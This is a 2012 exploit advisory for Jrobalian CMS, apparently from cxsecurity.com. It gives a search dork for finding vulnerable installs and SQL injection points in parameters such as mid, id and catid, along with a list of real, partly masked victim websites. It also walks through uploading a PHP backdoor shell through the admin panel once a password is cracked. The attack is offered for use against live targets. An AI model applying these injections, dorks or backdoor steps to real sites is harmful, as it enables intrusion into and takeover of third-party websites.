Jrobalian CMS SQL Injection Vulnerability

2012.07.22
Credit: X-Cisadane
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:i.php?mid=

===================================================== Jrobalian CMS SQL Injection Vulnerability ===================================================== :----------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Jrobalian CMS SQL Injection Vulnerability : # Date : 21 July 2012 : # Author : X-Cisadane : # Software Link : http://www.jrobalian.com/ : # Version : ALL : # Category : Web Applications : # Vulnerability : SQL Injection Vulnerability & Upload Shell Vulnerability : # Tested On : Mozilla Firefox 7.0.1 (Windows) : # Greetz to : Andry Priatna, X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Winda Utari :----------------------------------------------------------------------------------------------------------------------------------------: DORKS ===== inurl:i.php?mid= Proof of Concept ================ 1.SQL Injection (With Error Notice & Without Error Notice) SITE TARGET.com/content/i.php?mid=[SQLi] OR SITE TARGET.com/content/i.php?mid=Integer Value&id=[SQLi] Example : http://www.daiXaircon.co.id/content/i.php?mid=4&id=41' http://www.inXtors-academy.co.id/content/i.php?mid=3&id=7' http://www.pdpXsi.co.id/content/i.php?mid=3&id=112' http://www.indoXksesfutures.com/content/i.php?mid=3&id=81' http://www.shopXattress.com/content/i.php?mid=69' Others : SITE TARGET.com/content/news.php?catid=[SQLi] Example : http://www.indoXksesfutures.com/content/news.php?catid=1'&?mid=6&id=20 http://www.idijaXXar.com/content/news.php?catid=1' http://www.contoXwebsite.com/content/news.php?catid=1'&mid=4&id=24 http://www.quadrX.co.id/content/news.php?show=comment&id=11' http://www.contohXXXbsite.com/content/pd_events.php?mid=4&id=&catid=1'&show=archive http://www.daikinaXXXcon.co.id/content/products.php?plid=1&mid=2&id=21' http://www.daikinXXXrcon.co.id/content/projects.php?mid=3&ptid=13' http://www.daikXXXaircon.co.id/content/gallery.php?&mid=13&id=17' http://www.daXXXircon.co.id/content/downloads.php?&mid=5&id=28' http://www.daikiXXcon.co.id/content/faqs.php?&mid=5&id=29' http://www.daikiXXcon.co.id/content/training.php?&mid=5&id=30' Explore more your self... Tested With Havij - Advanced SQL Injection Tool Version 1.15 Free 2.Upload Shell (Must login with admin privilege) If the force with you (you've successfully cracked the password) 0:) you can login with Admin privilege into CMS. Admin login page : SITE TARGET.com/admin/ or SITE TARGET.com/content/admin/ Example : http://www.shop4mattress.com/admin/ Then Upload Shell from Administrator Modules -> Website Contents -> Newsroom & Articles -> Create NEW Articles. Insert an ATTACHMENT (your .php Backdoor) Then check Published to yes, and click SAVE! After that check your PHP Backdoor in this directory -> 'SITE TARGET.com/content_file/YOUR PHP BACKDOOR.php' OR you can upload PHP Shell from Administrator Modules -> Website Contents -> Downloads -> Create New file to Downloads. Insert Title, Description, Insert your PHP Backdoor (browse) Then click SAVE! After that check your PHP Backdoor in this directory -> 'SITE TARGET.com/content/downloads.php' Then Click Button 'Unduh' (Download), After that your browser will shown a pop-up to download a file, example : file21_ba.php <--- Your PHP Backdoor which automatically renamed by the CMS. You can access file21_ba.php by following this link 'SITE TARGET.com/downloads/Your Renamed PHP Backdoor.php'

References:

http://www.jrobalian.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top